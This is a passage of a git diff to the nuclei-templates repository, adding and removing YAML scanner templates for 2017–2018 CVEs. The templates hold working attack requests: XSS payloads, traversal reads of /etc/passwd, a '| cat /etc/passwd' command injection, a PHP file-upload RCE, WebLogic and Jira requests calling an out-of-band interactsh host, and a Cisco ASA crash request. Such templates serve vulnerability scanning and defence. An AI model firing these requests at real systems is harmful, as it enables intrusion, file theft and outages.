6.10 + cve-id: CVE-2017-18024 + cwe-id: CWE-79 + +requests: + - raw: + - | + POST / HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + username=admin&password=admin&_submit_check=1&jlbqgb7g0x=1 + + matchers-condition: and + matchers: + - type: word + words: + - '' + - 'AvantFAX' + part: body + condition: and + + - type: status + status: + - 200 + + - type: word + part: header + words: + - "text/html" diff --git a/nuclei-templates/CVE-2017/cve-2017-18536.yaml b/nuclei-templates/CVE-2017/cve-2017-18536.yaml new file mode 100644 index 0000000000..4f60e9dca3 --- /dev/null +++ b/nuclei-templates/CVE-2017/cve-2017-18536.yaml @@ -0,0 +1,35 @@ +id: CVE-2017-18536 + +info: + name: Stop User Enumeration 1.3.5-1.3.7 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + description: The Stop User Enumeration WordPress plugin was affected by an Unauthenticated Reflected Cross-Site Scripting (XSS) security vulnerability. + reference: https://wpscan.com/vulnerability/956cc5fd-af06-43ac-aa85-46b468c73501 + tags: cve,cve2017,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2017-18536 + cwe-id: CWE-79 + +requests: + - method: GET + path: + - "{{BaseURL}}/?author=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2017/cve-2017-3506.yaml b/nuclei-templates/CVE-2017/cve-2017-3506.yaml deleted file mode 100644 index b19b9142da..0000000000 --- a/nuclei-templates/CVE-2017/cve-2017-3506.yaml +++ /dev/null @@ -1,46 +0,0 @@ -id: CVE-2017-3506 - -info: - name: Oracle Weblogic Remote OS Command Execution - author: pdteam - description: Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (Web Services). Supported versions that are affected are 10.3.6.0, 12.1.3.0, 12.2.1.0, 12.2.1.1 and 12.2.1.2. Difficult to exploit vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. - severity: high - tags: cve,cve2017,weblogic,oracle,rce,oast - reference: - - https://hackerone.com/reports/810778 - - https://nvd.nist.gov/vuln/detail/CVE-2017-3506 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N - cvss-score: 7.40 - cve-id: CVE-2017-3506 - -requests: - - raw: - - | - POST /wls-wsat/RegistrationRequesterPortType HTTP/1.1 - Host: {{Hostname}} - Content-Type: text/xml - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8, - Content-Type: text/xml;charset=UTF-8 - - - - - - - http://{{interactsh-url}} - - - - - - - - - - - matchers: - - type: word - part: interactsh_protocol # Confirms the HTTP Interaction - words: - - "http" diff --git a/nuclei-templates/CVE-2017/cve-2017-5982.yaml b/nuclei-templates/CVE-2017/cve-2017-5982.yaml new file mode 100644 index 0000000000..1f114f79b3 --- /dev/null +++ b/nuclei-templates/CVE-2017/cve-2017-5982.yaml @@ -0,0 +1,31 @@ +id: CVE-2017-5982 +info: + name: Kodi 17.1 Local File Inclusion + author: 0x_Akoko + severity: high + description: Insufficient validation of user input is performed on this URL resulting in a local file inclusion vulnerability. + reference: + - https://cxsecurity.com/issue/WLB-2017020164 + - https://www.cvedetails.com/cve/CVE-2017-5982 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2017-5982 + cwe-id: CWE-98 + tags: cve,cve2017,kodi,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/image/image%3A%2F%2F%2e%2e%252fetc%252fpasswd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:[x*]:0:0" + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2017/cve-2017-6090.yaml b/nuclei-templates/CVE-2017/cve-2017-6090.yaml new file mode 100644 index 0000000000..38352df854 --- /dev/null +++ b/nuclei-templates/CVE-2017/cve-2017-6090.yaml @@ -0,0 +1,44 @@ +id: CVE-2017-6090 + +info: + name: PhpCollab (unauthenticated) Arbitrary File Upload + author: pikpikcu + severity: high + tags: cve,cve2017,phpcollab,rce,fileupload + reference: https://nvd.nist.gov/vuln/detail/CVE-2017-6090 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.80 + cve-id: CVE-2017-6090 + cwe-id: CWE-434 + description: "Unrestricted file upload vulnerability in clients/editclient.php in PhpCollab 2.5.1 and earlier allows remote authenticated users to execute arbitrary code by uploading a file with an executable extension, then accessing it via a direct request to the file in logos_clients/." + +requests: + - raw: + - | # REQUEST 1 + POST /clients/editclient.php?id={{randstr}}&action=update HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=---------------------------154934846911423734231554128137 + + -----------------------------154934846911423734231554128137 + Content-Disposition: form-data; name="upload"; filename="{{randstr}}.php" + Content-Type: application/x-php + + + + -----------------------------154934846911423734231554128137-- + + - | # REQUEST 2 + GET /logos_clients/1.php HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "48dbd2384cb6b996fa1e2855c7f0567f" + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2017/CVE-2017-6361.yaml b/nuclei-templates/CVE-2017/cve-2017-6361.yaml similarity index 100% rename from nuclei-templates/CVE-2017/CVE-2017-6361.yaml rename to nuclei-templates/CVE-2017/cve-2017-6361.yaml diff --git a/nuclei-templates/CVE-2017/cve-2017-7391.yaml b/nuclei-templates/CVE-2017/cve-2017-7391.yaml new file mode 100644 index 0000000000..b17e18d01d --- /dev/null +++ b/nuclei-templates/CVE-2017/cve-2017-7391.yaml @@ -0,0 +1,36 @@ +id: CVE-2017-7391 + +info: + name: Magmi – Cross-Site Scripting v.0.7.22 + author: pikpikcu + severity: medium + description: A Cross-Site Scripting (XSS) was discovered in 'Magmi 0.7.22'. The vulnerability exists due to insufficient filtration of user-supplied data (prefix) passed to the 'magmi-git-master/magmi/web/ajax_gettime.php' URL. + tags: cve,cve2017,magmi,xss + reference: + - https://github.com/dweeves/magmi-git/issues/522 + - https://github.com/dweeves/magmi-git/releases/download/0.7.22/magmi_full_0.7.22.zip + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2017-7391 + cwe-id: CWE-79 + +requests: + - method: GET + path: + - "{{BaseURL}}/magmi/web/ajax_gettime.php?prefix=%22%3E%3Cscript%3Ealert(document.domain);%3C/script%3E%3C" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - '"><' + part: body + + - type: word + words: + - "text/html" + part: header \ No newline at end of file diff --git a/nuclei-templates/CVE-2017/CVE-2017-7529.yaml b/nuclei-templates/CVE-2017/cve-2017-7529.yaml similarity index 100% rename from nuclei-templates/CVE-2017/CVE-2017-7529.yaml rename to nuclei-templates/CVE-2017/cve-2017-7529.yaml diff --git a/nuclei-templates/CVE-2017/cve-2017-9506.yaml b/nuclei-templates/CVE-2017/cve-2017-9506.yaml deleted file mode 100644 index a76d387e75..0000000000 --- a/nuclei-templates/CVE-2017/cve-2017-9506.yaml +++ /dev/null @@ -1,30 +0,0 @@ -id: CVE-2017-9506 - -info: - name: Jira IconURIServlet SSRF - author: pdteam - severity: medium - description: The IconUriServlet of the Atlassian OAuth Plugin from version 1.3.0 before version 1.9.12 and from version 2.0.0 before version 2.0.4 allows remote attackers to access the content of internal network resources and/or perform an XSS attack via Server Side Request Forgery (SSRF). - reference: - - http://dontpanic.42.nl/2017/12/there-is-proxy-in-your-atlassian.html - - https://ecosystem.atlassian.net/browse/OAUTH-344 - - https://medium.com/bugbountywriteup/piercing-the-veil-server-side-request-forgery-to-niprnet-access-171018bca2c3 - tags: cve,cve2017,atlassian,jira,ssrf,oast - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 - cve-id: CVE-2017-9506 - cwe-id: CWE-918 - -requests: - - raw: - - | - GET /plugins/servlet/oauth/users/icon-uri?consumerUri=http://{{interactsh-url}} HTTP/1.1 - Host: {{Hostname}} - Origin: {{BaseURL}} - - matchers: - - type: word - part: interactsh_protocol # Confirms the HTTP Interaction - words: - - "http" diff --git a/nuclei-templates/CVE-2017/cve-2017-9833.yaml b/nuclei-templates/CVE-2017/cve-2017-9833.yaml deleted file mode 100644 index fcdf436a30..0000000000 --- a/nuclei-templates/CVE-2017/cve-2017-9833.yaml +++ /dev/null @@ -1,46 +0,0 @@ -id: CVE-2017-9833 - -info: - name: BOA Web Server 0.94.14 - Arbitrary File Access - author: 0x_Akoko - severity: high - description: BOA Web Server 0.94.14 is susceptible to arbitrary file access. The server allows the injection of "../.." using the FILECAMERA variable sent by GET to read files with root privileges and without using access credentials. - impact: | - An attacker can gain unauthorized access to sensitive files on the server. - remediation: | - Upgrade to a patched version of BOA Web Server or apply the necessary security patches. - reference: - - https://www.exploit-db.com/exploits/42290 - - https://nvd.nist.gov/vuln/detail/CVE-2017-9833 - - https://pastebin.com/raw/rt7LJvyF - - https://www.exploit-db.com/exploits/42290/ - - https://github.com/ARPSyndicate/kenzer-templates - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2017-9833 - cwe-id: CWE-22 - epss-score: 0.7354 - epss-percentile: 0.98027 - cpe: cpe:2.3:a:boa:boa:0.94.14.21:*:*:*:*:*:*:* - metadata: - max-request: 1 - vendor: boa - product: boa - tags: cve,cve2017,boa,lfr,lfi,edb - -http: - - method: GET - path: - - "{{BaseURL}}/cgi-bin/wapopen?B1=OK&NO=CAM_16&REFRESH_TIME=Auto_00&FILECAMERA=../../etc/passwd%00&REFRESH_HTML=auto.htm&ONLOAD_HTML=onload.htm&STREAMING_HTML=streaming.htm&NAME=admin&PWD=admin&PIC_SIZE=0" - - matchers-condition: and - matchers: - - type: regex - regex: - - "root:[x*]:0:0" - - - type: status - status: - - 200 -# digest: 4a0a00473045022100c6c5530e8a0f7728fab4cc19d39ab606e55af708d754eddf2173d358e60e8520022056dcf2c7ef111692f117a4df198df23d7ffdb051dbf23191bd3d3c8f2e81eaed:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2018/CVE-2018-0101.yaml b/nuclei-templates/CVE-2018/CVE-2018-0101.yaml new file mode 100644 index 0000000000..617dcbd20c --- /dev/null +++ b/nuclei-templates/CVE-2018/CVE-2018-0101.yaml @@ -0,0 +1,47 @@ +id: cve-2018-0101 +info: + name: Cisco ASA Denial-of-Service # Leads to RCE + author: dwisiswant0 + severity: critical + reference: https://www.exploit-db.com/exploits/43986 + description: | + A vulnerability in the XML parser of Cisco Adaptive Security Appliance (ASA) Software could allow an unauthenticated, + remote attacker to cause a reload of the affected system or to remotely execute code. It was also possible that + the ASA could stop processing incoming Virtual Private Network (VPN) authentication requests due to a low memory condition. + tags: cve,cve2018,cisco,dos,rce +requests: + - raw: + - | + GET / HTTP/1.1 + Host: {{Hostname}} + Accept: */* + - | + POST / HTTP/1.1 + Host: {{Hostname}} + Accept: */* + Content-Type: application/x-www-form-urlencoded + X-Aggregate-Auth: 1 + X-Transcend-Version: 1 + Accept-Encoding: identity + X-AnyConnect-Platform: linux-64 + X-Support-HTTP-Auth: false + X-Pad: 0000000000000000000000000000000000000000 + + + + A + + req-condition: true + matchers-condition: and + matchers: + - type: dsl + dsl: + - "status_code_1 == 200" + - type: dsl + dsl: + - "status_code_2 == 500" + - "status_code_2 == 501" + - "status_code_2 == 502" + - "status_code_2 == 503" + - "status_code_2 == 504" + condition: or diff --git a/nuclei-templates/CVE-2018/CVE-2018-0127.yaml b/nuclei-templates/CVE-2018/CVE-2018-0127.yaml deleted file mode 100644 index 3ad69c3b88..0000000000 --- a/nuclei-templates/CVE-2018/CVE-2018-0127.yaml +++ /dev/null @@ -1,40 +0,0 @@ -id: CVE-2018-0127 - -info: - name: Cisco RV132W/RV134W Router - Information Disclosure - author: jrolf - severity: critical - description: Cisco RV132W ADSL2+ Wireless-N VPN Routers and Cisco RV134W VDSL2 Wireless-AC VPN Routers could allow an unauthenticated, remote attacker to view configuration parameters for an affected device via the web interface, which could lead to the disclosure of confidential information. - reference: - - https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180207-rv13x_2 - - http://www.securitytracker.com/id/1040345 - - http://www.securityfocus.com/bid/102969 - - https://nvd.nist.gov/vuln/detail/CVE-2018-0127 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2018-0127 - cwe-id: CWE-306 - tags: cve,cve2018,cisco,router - -requests: - - method: GET - path: - - "{{BaseURL}}/dumpmdm.cmd" - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - part: body - condition: and - words: - - "Dump" - - "MDM" - - "cisco" - - "admin" - -# Enhanced by mp on 2022/05/12 diff --git a/nuclei-templates/CVE-2018/CVE-2018-1000129.yaml b/nuclei-templates/CVE-2018/CVE-2018-1000129.yaml index 0396c98adb..9fc6a43150 100644 --- a/nuclei-templates/CVE-2018/CVE-2018-1000129.yaml +++ b/nuclei-templates/CVE-2018/CVE-2018-1000129.yaml @@ -2,45 +2,36 @@ id: CVE-2018-1000129 info: name: Jolokia XSS - author: mavericknerd,0h1in9e,daffainfo + author: mavericknerd,0h1in9e severity: medium - description: | - An XSS vulnerability exists in the Jolokia agent version 1.3.7 in the HTTP servlet that allows an attacker to execute malicious javascript in the victim's browser. - reference: - - https://jolokia.org/#Security_fixes_with_1.5.0 - - https://github.com/rhuss/jolokia/commit/5895d5c137c335e6b473e9dcb9baf748851bbc5f#diff-f19898247eddb55de6400489bff748ad - - https://blog.gdssecurity.com/labs/2018/4/18/jolokia-vulnerabilities-rce-xss.html - - https://blog.it-securityguard.com/how-i-made-more-than-30k-with-jolokia-cves/ + description: An XSS vulnerability exists in the Jolokia agent version 1.3.7 in the HTTP servlet that allows an attacker to execute malicious javascript in the victim's browser. + tags: cve,cve2018,jolokia,xss classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 + cvss-score: 6.10 cve-id: CVE-2018-1000129 cwe-id: CWE-79 - tags: cve,cve2018,jolokia,xss + reference: + - https://jolokia.org/#Security_fixes_with_1.5.0 + - https://github.com/rhuss/jolokia/commit/5895d5c137c335e6b473e9dcb9baf748851bbc5f#diff-f19898247eddb55de6400489bff748ad + - https://access.redhat.com/errata/RHSA-2018:2669 + - https://access.redhat.com/errata/RHSA-2018:3817 requests: - method: GET path: - - "{{BaseURL}}/api/jolokia/read?mimeType=text/html" - - "{{BaseURL}}/jolokia/read?mimeType=text/html" - - stop-at-first-match: true + - "{{BaseURL}}/jolokia/read?mimeType=text/html" + - "{{BaseURL}}/api/jolokia/read?mimeType=text/html" matchers-condition: and matchers: - + - type: status + status: + - 200 - type: word - part: body words: - "" - - "java.lang.IllegalArgumentException" - - "No type with name" - condition: and - + part: body - type: word - part: header words: - "text/html" - - - type: status - status: - - 200 + part: header \ No newline at end of file diff --git a/nuclei-templates/CVE-2018/CVE-2018-1000130.yaml b/nuclei-templates/CVE-2018/CVE-2018-1000130.yaml index 8fe310b37c..9b56c41fde 100644 --- a/nuclei-templates/CVE-2018/CVE-2018-1000130.yaml +++ b/nuclei-templates/CVE-2018/CVE-2018-1000130.yaml @@ -5,15 +5,15 @@ info: author: milo2012 severity: high description: A JNDI Injection vulnerability exists in Jolokia agent in the proxy mode that allows a remote attacker to run arbitrary Java code on the server. - reference: - - https://jolokia.org/#Security_fixes_with_1.5.0 - - https://access.redhat.com/errata/RHSA-2018:2669 + tags: cve,cve2018,jolokia,rce,jndi,proxy classification: cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 8.1 + cvss-score: 8.10 cve-id: CVE-2018-1000130 cwe-id: CWE-74 - tags: cve,cve2018,jolokia,rce,jndi,proxy + reference: + - https://jolokia.org/#Security_fixes_with_1.5.0 + - https://access.redhat.com/errata/RHSA-2018:2669 requests: - raw: diff --git a/nuclei-templates/CVE-2018/CVE-2018-1000856.yaml b/nuclei-templates/CVE-2018/CVE-2018-1000856.yaml new file mode 100644 index 0000000000..836d88b898 --- /dev/null +++ b/nuclei-templates/CVE-2018/CVE-2018-1000856.yaml @@ -0,0 +1,52 @@ +id: CVE-2018-1000856 +info: + name: DomainMOD 4.11.01 - Cross-Site Scripting + author: arafatansari + severity: medium + description: | + DomainMOD 4.11.01 is vulnerable to Cross Site Scripting (XSS) via segments/add.php Segment Name field. + reference: + - https://github.com/domainmod/domainmod/issues/80 + - https://nvd.nist.gov/vuln/detail/CVE-2018-1000856 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N + cvss-score: 4.8 + cve-id: CVE-2018-1000856 + cwe-id: CWE-79 + metadata: + verified: "true" + tags: cve,cve2018,domainmod,xss,authenticated +requests: + - raw: + - | + POST / HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + new_username={{username}}&new_password={{password}} + - | + POST /segments/add.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + new_name=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&raw_domain_list=test.com&new_description=test&new_notes=test + - | + GET /segments/ HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + cookie-reuse: true + redirects: true + max-redirects: 3 + matchers-condition: and + matchers: + - type: word + part: body + words: + - "" + - type: word + part: header + words: + - text/html + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2018/CVE-2018-10201.yaml b/nuclei-templates/CVE-2018/CVE-2018-10201.yaml new file mode 100644 index 0000000000..f5b143ea99 --- /dev/null +++ b/nuclei-templates/CVE-2018/CVE-2018-10201.yaml @@ -0,0 +1,38 @@ +id: CVE-2018-10201 + +info: + name: Ncomputing vSPace Pro 10 and 11 - Directory Traversal + author: 0x_akoko + severity: high + description: Ncomputing vSpace Pro versions 10 and 11 suffer from a directory traversal vulnerability. + reference: + - https://packetstormsecurity.com/files/147303/Ncomputing-vSPace-Pro-10-11-Directory-Traversal.html + - https://www.cvedetails.com/cve/CVE-2018-10201 + - http://www.kwell.net/kwell_blog/?p=5199 + - https://www.kwell.net/kwell/index.php?option=com_newsfeeds&view=newsfeed&id=15&Itemid=173&lang=es + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2018-10201 + cwe-id: CWE-22 + tags: cve,cve2018,ncomputing,lfi + +requests: + - method: GET + path: + - '{{BaseURL}}/.../.../.../.../.../.../.../.../.../windows/win.ini' + - '{{BaseURL}}/...\...\...\...\...\...\...\...\...\windows\win.ini' + - '{{BaseURL}}/..../..../..../..../..../..../..../..../..../windows/win.ini' + - '{{BaseURL}}/....\....\....\....\....\....\....\....\....\windows\win.ini' + + stop-at-first-match: true + matchers: + - type: word + part: body + words: + - "bit app support" + - "fonts" + - "extensions" + condition: and + +# Enhanced by mp on 2022/04/26 diff --git a/nuclei-templates/CVE-2018/CVE-2018-10230.yaml b/nuclei-templates/CVE-2018/CVE-2018-10230.yaml new file mode 100644 index 0000000000..281d1a1d81 --- /dev/null +++ b/nuclei-templates/CVE-2018/CVE-2018-10230.yaml @@ -0,0 +1,36 @@ +id: CVE-2018-10230 +info: + name: Zend Server < 9.13 - XSS + author: marcos_iaf + severity: medium + description: | + A vulnerability in ZendServer < 9.13 allows an attacker to perform Reflected XSS via the debug_host parameter. + reference: + - https://www.synacktiv.com/ressources/zend_server_9_1_3_xss.pdf + - https://nvd.nist.gov/vuln/detail/CVE-2018-10230 + - https://www.zend.com/en/products/server/release-notes + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2018-10230 + cwe-id: CWE-79 + tags: cve,cve2018,xss,zend +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?debug_host=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&start_debug=1" + matchers-condition: and + matchers: + - type: word + part: body + words: + - "" + - "is not allowed to open debug sessions" + condition: and + - type: word + part: header + words: + - text/html + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2018/CVE-2018-10822.yaml b/nuclei-templates/CVE-2018/CVE-2018-10822.yaml deleted file mode 100644 index 072879bf42..0000000000 --- a/nuclei-templates/CVE-2018/CVE-2018-10822.yaml +++ /dev/null @@ -1,34 +0,0 @@ -id: CVE-2018-10822 - -info: - name: D-Link Routers - Directory Traversal - author: daffainfo - severity: high - description: Directory traversal vulnerability in the web interface on D-Link routers DWR-116 through 1.06, DIR-140L through 1.02, DIR-640L through 1.02,DWR-512 through 2.02,DWR-712 through 2.02,DWR-912 through 2.02, DWR-921 through 2.02, DWR-111 through 1.01, and probably others with the same type of firmware allows remote attackers to read arbitrary files via a /.. or // after "GET /uir" in an HTTP request. - reference: - - https://www.exploit-db.com/exploits/45678 - - https://nvd.nist.gov/vuln/detail/CVE-2018-10822 - - https://seclists.org/fulldisclosure/2018/Oct/36 - - http://sploit.tech/2018/10/12/D-Link.html - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2018-10822 - cwe-id: CWE-22 - tags: cve,cve2018,lfi,router,dlink - -requests: - - method: GET - path: - - "{{BaseURL}}/uir//etc/passwd" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0:" - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2018/CVE-2018-10823.yaml b/nuclei-templates/CVE-2018/CVE-2018-10823.yaml deleted file mode 100644 index 0f611d04de..0000000000 --- a/nuclei-templates/CVE-2018/CVE-2018-10823.yaml +++ /dev/null @@ -1,34 +0,0 @@ -id: CVE-2018-10823 - -info: - name: D-Link Routers - Command Injection - author: wisnupramoedya - severity: high - description: An issue was discovered on D-Link DWR-116 through 1.06, DWR-512 through 2.02, DWR-712 through 2.02, DWR-912 through 2.02, DWR-921 through 2.02, and DWR-111 through 1.01 devices. An authenticated attacker may execute arbitrary code by injecting the shell command into the chkisg.htm page Sip parameter. This allows for full control over the device internals. - reference: - - https://www.exploit-db.com/exploits/45676 - - https://nvd.nist.gov/vuln/detail/CVE-2018-10823 - - https://seclists.org/fulldisclosure/2018/Oct/36 - - http://sploit.tech/2018/10/12/D-Link.html - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H - cvss-score: 8.8 - cve-id: CVE-2018-10823 - cwe-id: CWE-78 - tags: cve,cve2018,rce,iot,dlink,router - -requests: - - method: GET - path: - - "{{BaseURL}}/chkisg.htm%3FSip%3D1.1.1.1%20%7C%20cat%20%2Fetc%2Fpasswd" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0:" - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2018/cve-2018-11776.yaml b/nuclei-templates/CVE-2018/CVE-2018-11776.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-11776.yaml rename to nuclei-templates/CVE-2018/CVE-2018-11776.yaml diff --git a/nuclei-templates/CVE-2018/CVE-2018-11784.yaml b/nuclei-templates/CVE-2018/CVE-2018-11784.yaml index 371917e082..0dca4eab1e 100644 --- a/nuclei-templates/CVE-2018/CVE-2018-11784.yaml +++ b/nuclei-templates/CVE-2018/CVE-2018-11784.yaml @@ -1,20 +1,17 @@ id: CVE-2018-11784 info: - name: Apache Tomcat - Open Redirect + name: Apache Tomcat Open Redirect author: geeknik - severity: medium description: Apache Tomcat versions prior to 9.0.12, 8.5.34, and 7.0.91 are prone to an open-redirection vulnerability because it fails to properly sanitize user-supplied input. - reference: - - https://lists.apache.org/thread.html/23134c9b5a23892a205dc140cdd8c9c0add233600f76b313dda6bd75@%3Cannounce.tomcat.apache.org%3E - - https://nvd.nist.gov/vuln/detail/CVE-2018-11784 - - http://www.securityfocus.com/bid/105524 + reference: https://lists.apache.org/thread.html/23134c9b5a23892a205dc140cdd8c9c0add233600f76b313dda6bd75@%3Cannounce.tomcat.apache.org%3E + severity: medium + tags: tomcat,redirect,cve,cve2018,apache classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N - cvss-score: 4.3 + cvss-score: 4.30 cve-id: CVE-2018-11784 cwe-id: CWE-601 - tags: tomcat,redirect,cve,cve2018,apache requests: - method: GET @@ -26,5 +23,3 @@ requests: regex: - "(?m)^(L|l)ocation: (((http|https):)?//(www.)?)?example.com" part: header - -# Enhanced by mp on 2022/04/26 diff --git a/nuclei-templates/CVE-2018/CVE-2018-12031.yaml b/nuclei-templates/CVE-2018/CVE-2018-12031.yaml deleted file mode 100644 index 4e98b1fb1d..0000000000 --- a/nuclei-templates/CVE-2018/CVE-2018-12031.yaml +++ /dev/null @@ -1,37 +0,0 @@ -id: CVE-2018-12031 - -info: - name: Eaton Intelligent Power Manager 1.6 - Directory Traversal - author: daffainfo - severity: critical - description: Eaton Intelligent Power Manager v1.6 allows an attacker to include a file via directory traversal, which can lead to sensitive information disclosure, denial of service and code execution. - reference: - - https://github.com/EmreOvunc/Eaton-Intelligent-Power-Manager-Local-File-Inclusion - - https://www.exploit-db.com/exploits/48614 - - https://nvd.nist.gov/vuln/detail/CVE-2018-12031 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2018-12031 - cwe-id: CWE-22 - tags: cve,cve2018,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../etc/passwd" - - "{{BaseURL}}/server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../Windows/win.ini" - - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - - "\\[(font|extension|file)s\\]" - condition: or - part: body - - type: status - status: - - 200 - -# Enhanced by mp on 2022/05/12 diff --git a/nuclei-templates/CVE-2018/CVE-2018-12296.yaml b/nuclei-templates/CVE-2018/CVE-2018-12296.yaml deleted file mode 100644 index 02f94c31e4..0000000000 --- a/nuclei-templates/CVE-2018/CVE-2018-12296.yaml +++ /dev/null @@ -1,38 +0,0 @@ -id: CVE-2018-12296 - -info: - name: Seagate NAS OS 4.3.15.1 - Server Information Disclosure - author: princechaddha - severity: high - description: Insufficient access control in /api/external/7.0/system.System.get_infos in Seagate NAS OS version 4.3.15.1 allows attackers to obtain information about the NAS without authentication via empty POST requests. - reference: - - https://blog.securityevaluators.com/invading-your-personal-cloud-ise-labs-exploits-the-seagate-stcr3000101-ecf89de2170 - - https://nvd.nist.gov/vuln/detail/CVE-2018-12296 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2018-12296 - cwe-id: CWE-732 - tags: cve,cve2018,seagate,nasos,disclosure,unauth - -requests: - - raw: - - | - POST /api/external/7.0/system.System.get_infos HTTP/1.1 - Host: {{Hostname}} - Referer: {{BaseURL}} - - matchers: - - type: word - part: body - words: - - '"version":' - - '"serial_number":' - condition: and - - extractors: - - type: regex - part: body - group: 1 - regex: - - '"version": "([0-9.]+)"' diff --git a/nuclei-templates/CVE-2018/cve-2018-12300.yaml b/nuclei-templates/CVE-2018/CVE-2018-12300.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-12300.yaml rename to nuclei-templates/CVE-2018/CVE-2018-12300.yaml diff --git a/nuclei-templates/CVE-2018/CVE-2018-12613.yaml b/nuclei-templates/CVE-2018/CVE-2018-12613.yaml new file mode 100644 index 0000000000..9b58a055d2 --- /dev/null +++ b/nuclei-templates/CVE-2018/CVE-2018-12613.yaml @@ -0,0 +1,35 @@ +id: CVE-2018-12613 + +info: + name: PhpMyAdmin 4.8.1 Remote File Inclusion + author: pikpikcu + severity: high + description: An issue was discovered in phpMyAdmin 4.8.x before 4.8.2, in which an attacker can include (view and potentially execute) files on the server. The vulnerability comes from a portion of code where pages are redirected and loaded within phpMyAdmin, and an improper test for whitelisted pages. An attacker must be authenticated, except in the "$cfg['AllowArbitraryServer'] = true" case (where an attacker can specify any host he/she is already in control of, and execute arbitrary code on phpMyAdmin) and the "$cfg['ServerDefault'] = 0" case (which bypasses the login requirement and runs the vulnerable code without any authentication). + reference: + - https://github.com/vulhub/vulhub/tree/master/phpmyadmin/CVE-2018-12613 + - https://www.phpmyadmin.net/security/PMASA-2018-4/ + - https://www.exploit-db.com/exploits/44928/ + - http://www.securityfocus.com/bid/104532 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2018-12613 + cwe-id: CWE-287 + tags: cve,cve2018,phpmyadmin,lfi + +requests: + - method: GET + path: + - 